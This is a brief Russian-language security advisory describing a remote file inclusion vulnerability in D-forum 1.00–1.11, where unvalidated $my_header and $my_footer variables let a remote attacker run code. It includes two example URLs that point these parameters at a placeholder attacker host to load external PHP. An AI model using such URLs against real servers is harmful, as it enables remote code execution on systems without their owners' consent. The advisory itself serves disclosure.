Уязвимость включения файла обнаружена в D-forum. Удаленный пользователь может выполнять произвольные команды на операционной системе.

Файл header.php3 включает переменную $my_header и файл
footer.php3 включает $my_footer переменную без надлежащей проверки. 

В результате удаленный атакующий может сконструировать URL, который
определит удаленное местоположение для $my_header или $my_footer. PHP код, на который ссылаются эти переменные, будет включен и выполнен целевым сервером. Пример: 

http://[target]/includes/footer.php3? my_footer=http://[attacker]/scriptt xt
http://[target]/includes/header.php3? my_header=http://[attacker]/scripttxt

Уязвимость обнаружена в D-forum 1.00 — 1.11; version 1.11 before November 23, 2002.



Оставить мнение